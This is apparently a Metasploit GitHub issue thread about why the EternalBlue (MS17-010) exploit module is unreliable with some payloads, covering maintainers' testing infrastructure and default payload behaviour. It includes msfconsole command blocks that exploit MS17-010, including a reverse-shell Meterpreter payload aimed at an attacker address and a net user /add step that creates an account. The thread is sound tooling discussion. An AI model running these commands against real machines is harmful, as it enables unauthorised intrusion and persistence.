How'd you do it?
```
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/adduser
set RHOSTS <vulnerable ip addr>
run
```
With that payload, it should add a user to the vulnerable target machine.
It does not always work properly.
Framework: 5.0.2-dev
Console : 5.0.2-dev
Kali Linux 2019.1 AMD64
I also would like to add:
The exploit works fine without specifying a payload; it's only when I add the payload that it becomes extremely unreliable.
Yeah, it's known that certain payloads are more reliable than others. The module description hints at that, but it was mostly during testing that we noticed it.
Sorry I don't have a better answer.
I totally understand that it may not work 100% of the time, since this type of exploit requires the PC to execute a very specific part of the overflowed buffer. However, I did not find an existing issue for this, so I figured I would report it in case anyone else happened to be having the same problem. I searched online for hours trying to figure out if I was doing something wrong and found almost nothing related to attaching payloads to this exploit.
I don't think you're doing anything wrong. Perhaps certain payloads should be blacklisted. I recommend sticking with a proven Meterpreter payload and doing post-exploitation after.
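For example, something along these lines should accomplish what windows/adduser was meant to do, but more reliably (the addresses and credentials below are placeholders):
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <vulnerable ip addr>
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <attacker ip addr>
run
# once the Meterpreter session opens, drop to a system shell
shell
# and create the user post-exploitation instead of in shellcode
net user <username> <password> /add
```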
A way to sort by known-good payloads for an exploit would also be extremely helpful here. I know it would take a lot of work to test all of the payloads against all of the exploits; however, I think the benefits would be worth it.
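For what it's worth, msfconsole can already list the payloads that are nominally compatible with a loaded module; the missing piece is that "compatible" says nothing about tested reliability:
```
use exploit/windows/smb/ms17_010_eternalblue
# lists every payload the framework considers compatible with this
# module, with no indication of how reliable each one is in practice
show payloads
```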
On another note, the payload I used did not cause any system instability in the VM I was using; rather, nothing happened at all. I did get it to work once, but never again.
Paging @bwatters-r7. Maybe we can incorporate MS17-010 testing into our current payload testing? I'm iffy on the predictability, but maybe we can survey it more scientifically.
When we first had the 17-010 push, I found that our payload testing infrastructure as it stood could not really test it: everything failed when I tested 17-010 in parallel. At the time, I wound up having to write a custom wrapper for the tests that spun up each target and tested it in series (I still have no idea why it failed in parallel). That means testing 17-010 with a single payload against our normal target set takes about 10-15 _hours_ rather than the normal 15-20 _minutes_. If we wanted to cherry-pick some payloads/targets/versions, we could do it in an hour or two, depending on the number of payloads/targets/versions, but I have never set it up as default testing because of the huge time requirement.
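For the curious, the serial approach boils down to something like this (the VM names, snapshot name, test_ms17_010.rc resource script, and the choice of vmrun as the hypervisor CLI are all hypothetical stand-ins for the actual infrastructure):
```
#!/bin/sh
# Hypothetical serial wrapper: revert, boot, and test one target at a time.
# vmrun, the vmx paths, the "baseline" snapshot, and test_ms17_010.rc are
# all placeholders for whatever the real test range uses.
for target in win7sp1_x64 win2008r2_x64; do
  vmrun revertToSnapshot "vms/$target.vmx" baseline
  vmrun start "vms/$target.vmx" nogui
  msfconsole -q -r test_ms17_010.rc   # runs the exploit/payload under test
  vmrun stop "vms/$target.vmx" hard
done
```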
Hrm... after thinking this through a bit: if this is something that's really important, testing in series takes less compute power, so I could set up a separate range of VMs and crawl through them in the background while other tests ran. The server I use now is powerful enough to run the lighter tests as a group, unlike the one we had back when we were testing this originally. It would take some time to set up, but if we ran it on nights when we were not running the full x86 bin tests, it _should_ work.
Can you give me a set of 17-010 modules, payloads and windows versions you'd like tested? I can't promise anything soon unless it gets flagged as a priority, but I can start looking at getting the VMs built on my next baseline-builder run.
I think exploit/windows/smb/ms17_010_eternalblue, windows/x64/meterpreter/reverse_tcp, and Windows Server 2008 R2 would be a good start.
@CorruptComputer: What exactly do you mean by working fine without a payload?
Sorry for the late reply on this. I meant that if you select no payload for the exploit, for example:
```
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <vulnerable ip addr>
run
```
This will still spawn a Meterpreter shell on the victim machine.
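For anyone following along: the exploit is not actually running payload-free there. When no payload is set explicitly, msfconsole falls back to the module's default payload, which is why a Meterpreter session still comes back. You can check which payload will be used before running:
```
use exploit/windows/smb/ms17_010_eternalblue
# the "Payload options" section of the output names the default
# payload the framework has selected for this module
show options
```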
I don't think incorporating a specific range of tests is the solution we're looking for here. It seems like there's a broader need to help users understand which payloads are and are not compatible with which exploits (and why). Rather than adding testing overhead that doesn't solve the problem, I'm going to close this but stick it under a "usability" label we're tracking internally to plan changes that should make MSF more intuitive for users.